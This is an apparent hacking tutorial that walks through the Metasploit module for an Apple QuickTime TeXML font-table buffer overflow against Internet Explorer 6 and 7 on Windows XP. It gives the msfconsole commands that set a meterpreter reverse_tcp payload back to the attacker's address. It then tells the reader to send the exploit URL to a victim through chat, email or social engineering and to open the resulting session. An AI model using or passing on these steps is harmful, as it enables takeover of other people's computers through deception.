This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Apple QuickTime 7.7.2
Internet Explorer 6 on XP SP2
Internet Explorer 7 on XP SP2
Attacker: Backtrack 5
Victim PC: Windows XP SP 2
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/apple_quicktime_texml_font_table
msf exploit (apple_quicktime_texml_font_table)>set payload windows/meterpreter/reverse_tcp
msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.1.5 (This must be an address on the local machine)
msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit)
msf exploit (apple_quicktime_texml_font_table)>exploit
Now an URL you should give to your victim http://192.168.1.5:8080/
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“